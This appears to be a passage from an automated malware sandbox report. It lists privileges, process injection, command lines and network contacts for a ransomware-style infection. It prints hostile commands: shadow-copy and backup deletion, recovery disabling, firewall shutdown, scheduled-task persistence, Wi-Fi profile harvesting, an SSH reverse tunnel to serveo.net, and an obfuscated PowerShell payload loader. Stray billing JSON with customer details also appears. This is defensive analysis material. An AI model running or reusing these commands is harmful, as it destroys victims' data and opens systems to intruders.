Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B496.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EE27.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 2036 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 4400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1288 wrote to memory of 4400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 912 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 912 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1288 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1288 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 912 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 912 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 912 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 912 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3164 wrote to memory of 3880 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\B188.exe
PID 3164 wrote to memory of 3880 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\B188.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\rh111.exe

"C:\Users\Admin\AppData\Local\Temp\rh111.exe"

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

"C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe"

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

"C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe"

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

"C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe"

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\EE27.exe

C:\Users\Admin\AppData\Local\Temp\EE27.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Update.bat" "

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ECAF" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\ECAF.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe -debug

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "ECAF" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe"

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll",run

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Update.bat" "

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8827 serveo.net

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c {"id":"ev_16CQylTr9HADQ8O2P","occurred_at":1695898950,"source":"scheduled_job","object":"event","api_version":"v2","content":{"subscription":{"id":"2skdb1evRXnYFlMGH2","plan_id":"ai4images-base","plan_quantity":1,"plan_unit_price":0,"billing_period":1,"billing_period_unit":"month","customer_id":"JFIJqZ5RXnXRkQHl3","plan_amount":0,"plan_free_quantity":0,"status":"active","current_term_start":1693566148,"current_term_end":1696158148,"next_billing_at":1696158148,"created_at":1564570948,"started_at":1564570948,"activated_at":1564570948,"updated_at":1693566157,"has_scheduled_changes":false,"payment_source_id":"pm_JFIJqZ5RXnY8iBHyp","channel":"web","resource_version":1693566157242,"deleted":false,"object":"subscription","currency_code":"USD","addons":[{"id":"ai4images-base-100-images","quantity":1,"unit_price":1900,"amount":1900,"object":"addon"}],"due_invoices_count":0,"mrr":1900,"exchange_rate":1.0,"base_currency_code":"USD","cf_publication_name":"pawelu+[email protected]","has_scheduled_advance_invoices":false},"customer":{"id":"JFIJqZ5RXnXRkQHl3","first_name":"swed","last_name":"swed","email":"pawelu+[email protected]","auto_collection":"on","net_term_days":0,"allow_direct_debit":false,"created_at":1564570756,"taxability":"taxable","updated_at":1646097988,"pii_cleared":"active","resource_version":1646097988421,"deleted":false,"object":"customer","card_status":"expired","promotional_credits":0,"refundable_credits":0,"excess_payments":0,"unbilled_charges":0,"preferred_currency_code":"USD","mrr":0,"primary_payment_source_id":"pm_JFIJqZ5RXnY8iBHyp","payment_method":{"object":"payment_method","type":"card","reference_id":"cus_FXKACVkPUBOyuw/card_1F2FZ9FuHIzUYXpdxMXPr5fS","gateway":"stripe","gateway_account_id":"gw_1mMqa4WR6jrQrc8CH","status":"expired"},"tax_providers_fields":[],"channel":"web"},"card":{"status":"expired","gateway":"stripe","gateway_account_id":"gw_1mMqa4WR6jrQrc8CH","first_name":"pawelu+[email protected]","iin":"******","last4":"1111","card_type":"visa","funding_type":"not_known","expiry_month":2,"expiry_year":2022,"issuing_country":"US","created_at":1564570921,"updated_at":1646097988,"resource_version":1646097988422,"object":"card","masked_number":"************1111","customer_id":"JFIJqZ5RXnXRkQHl3","payment_source_id":"pm_JFIJqZ5RXnY8iBHyp"}},"event_type":"subscription_renewal_reminder","webhook_status":"not_configured","webhooks":[{"id":"whv2_1mkVvvBRC7Qspn600","webhook_status":"re_scheduled","object":"webhook"},{"id":"whv2_Hr5519qRORvZC33FWq","webhook_status":"re_scheduled","object":"webhook"},{"id":"whv2_Hr5511cRGYcZb4Bdm","webhook_status":"re_scheduled","object":"webhook"}]}

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c {"id":"ev_16CQylTr9HATf8O2m","occurred_at":1695898951,"source":"scheduled_job","object":"event","api_version":"v2","content":{"subscription":{"id":"2sUBzx0FRTeH8Gg1zOn","plan_id":"arkdam-basic","plan_quantity":1,"plan_unit_price":9900,"billing_period":1,"billing_period_unit":"month","customer_id":"B3ikf7RSzWUb84CzZ","plan_amount":9900,"plan_free_quantity":0,"status":"active","current_term_start":1693566149,"current_term_end":1696158149,"next_billing_at":1696158149,"created_at":1560769349,"started_at":1560769349,"activated_at":1560769349,"updated_at":1693566158,"has_scheduled_changes":false,"payment_source_id":"pm_2sUBzx8BRSzwcRS4eu9","channel":"web","resource_version":1693566158265,"deleted":false,"object":"subscription","currency_code":"USD","due_invoices_count":0,"mrr":9900,"exchange_rate":1.0,"base_currency_code":"USD","has_scheduled_advance_invoices":false},"customer":{"id":"B3ikf7RSzWUb84CzZ","first_name":"Test","last_name":"Test","email":"[email protected]","auto_collection":"on","net_term_days":0,"allow_direct_debit":false,"created_at":1560167180,"taxability":"taxable","updated_at":1614563604,"pii_cleared":"active","resource_version":1614563604604,"deleted":false,"object":"customer","card_status":"expired","promotional_credits":0,"refundable_credits":0,"excess_payments":0,"unbilled_charges":0,"preferred_currency_code":"USD","mrr":0,"primary_payment_source_id":"pm_2sUBzx8BRSzwcRS4eu9","payment_method":{"object":"payment_method","type":"card","reference_id":"cus_FEEQp7dUtoyGHI/card_1EjnZVFuHIzUYXpd6ZsULAYo","gateway":"stripe","gateway_account_id":"gw_1mMqa4WR6jrQrc8CH","status":"expired"},"tax_providers_fields":[],"channel":"web"},"card":{"status":"expired","gateway":"stripe","gateway_account_id":"gw_1mMqa4WR6jrQrc8CH","first_name":"[email protected]","iin":"******","last4":"4242","card_type":"visa","funding_type":"credit","expiry_month":2,"expiry_year":2021,"issuing_country":"US","created_at":1560173407,"updated_at":1614563604,"resource_version":1614563604605,"object":"card","masked_number":"************4242","customer_id":"B3ikf7RSzWUb84CzZ","payment_source_id":"pm_2sUBzx8BRSzwcRS4eu9"}},"event_type":"subscription_renewal_reminder","webhook_status":"not_configured","webhooks":[{"id":"whv2_1mkVvvBRC7Qspn600","webhook_status":"re_scheduled","object":"webhook"},{"id":"whv2_Hr5519qRORvZC33FWq","webhook_status":"re_scheduled","object":"webhook"},{"id":"whv2_Hr5511cRGYcZb4Bdm","webhook_status":"re_scheduled","object":"webhook"}]}

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\Update.bat.exe

"Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function ZqQQq($yrdIB){ $IjGLg=[System.Security.Cryptography.Aes]::Create(); $IjGLg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IjGLg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IjGLg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtEhSjk9/xTX7PlkU7WEq/tt3cb4ulKRYz+R+dnKvS4='); $IjGLg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V8mgOU0mNIV7j5K8gN4tUw=='); $lGSGI=$IjGLg.CreateDecryptor(); $return_var=$lGSGI.TransformFinalBlock($yrdIB, 0, $yrdIB.Length); $lGSGI.Dispose(); $IjGLg.Dispose(); $return_var;}function FKpZl($yrdIB){ $lUttd=New-Object System.IO.MemoryStream(,$yrdIB); $rSgqr=New-Object System.IO.MemoryStream; $xdyrL=New-Object System.IO.Compression.GZipStream($lUttd, [IO.Compression.CompressionMode]::Decompress); $xdyrL.CopyTo($rSgqr); $xdyrL.Dispose(); $lUttd.Dispose(); $rSgqr.Dispose(); $rSgqr.ToArray();}function YQlbE($yrdIB,$fOvUv){ $VnPHF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yrdIB); $eARGx=$VnPHF.EntryPoint; $eARGx.Invoke($null, $fOvUv);}$HYPPN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($Bivrj in $HYPPN) { if ($Bivrj.StartsWith('SEROXEN')) { $MGcDG=$Bivrj.Substring(7); break; }}$LdMVF=[string[]]$MGcDG.Split('\');$ZOxOl=FKpZl (ZqQQq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LdMVF[0])));$JHDWe=FKpZl (ZqQQq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LdMVF[1])));YQlbE $JHDWe (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));YQlbE $ZOxOl (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 servermlogs27.xyz udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 xemtex534.xyz udp
DE 212.87.212.222:80 xemtex534.xyz tcp
US 8.8.8.8:53 222.212.87.212.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 cdn1.frocdn.ch udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 180.194.10.204.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
